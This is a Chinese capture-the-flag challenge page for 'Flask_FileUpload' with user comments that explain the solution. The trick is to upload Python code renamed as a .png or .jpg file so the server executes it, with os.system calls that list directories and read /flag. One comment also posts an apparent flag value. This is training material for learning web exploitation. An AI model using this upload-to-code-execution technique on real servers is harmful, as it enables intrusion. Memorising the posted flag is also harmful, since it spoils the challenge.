Flask_FileUploadWEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
⎝Lazzaro⎠
一血奖励:
3金币
解 决:
11024
提 示:
描 述:
Flask_FileUpload
评论
Cat00011cat 1年前
举报
import os os.system('ls / -l') os.system('cat /flag')
nf1y 1年前
举报
为啥我返回包出现的是这样 File "/app/upload/test.jpg", line 1 SyntaxError: Non-UTF-8 code starting with '\xff' in file /app/upload/test.jpg on line 1, but no encoding declared; see http://python.org/de
不知名学渣 1年前
举报
@aWxvdmVjdGY 我是小白,请问大佬,我很好奇为什么传图片就会以代码形式执行,那么这个实现是类似apache的解析漏洞吗?
aWxvdmVjdGY 1年前
举报
1、<input type="file" name="file" accept=".jpg,.png">这里限制了格式,后端也会检查。需要将py文件后缀为png,然后上传会议python文件执行
白猫a 1年前
举报
这个作者可以哇,题目解的真精彩!!!
gfpeak 1年前
举报
<!-- flag{9e5c134c066dc490c9644ecd9655a482} -->
aWxvdmVjdGY 1年前
举报
不同的场景答案是不一样的
2224525664 1年前
举报
我只想说牛逼!!!!来自小白的感叹
18196731832 1年前
举报
注意换行
aWxvdmVjdGY 1年前
举报
用python开发工具写就好了
甜甜 1年前
举报
恍然大悟呀
丶我亚索贼六 1年前
举报
import os os.system('cat /flag')
玲珑湾 1年前
举报
话说传个马上去会怎样
admin999 1年前
举报
传了php上去提示ValueError: too many values to unpack (expected 2) // Werkzeug Debugger
66295112 1年前
举报
常规 按F12,看到一句话,你所上传的文件都会以python的方式返回结果。 哦了,然后上传 ,首先创建一个a.txt,写入 import os os.system('find / -name flag') //查找flag所在文件路径 然后改后缀为png即a.png后以图片上传,代码被执行,发现 /flag 在notepadd++中打开a.png,在后面添加一行 os.sy
kaer 1年前
举报
import os os.system('ls / -l') 命名为dir.png import os os.system('cat /flag') 命名为flag.png 上传两次 ls / -l 列举出文件的类型可以看出flag不是目录文件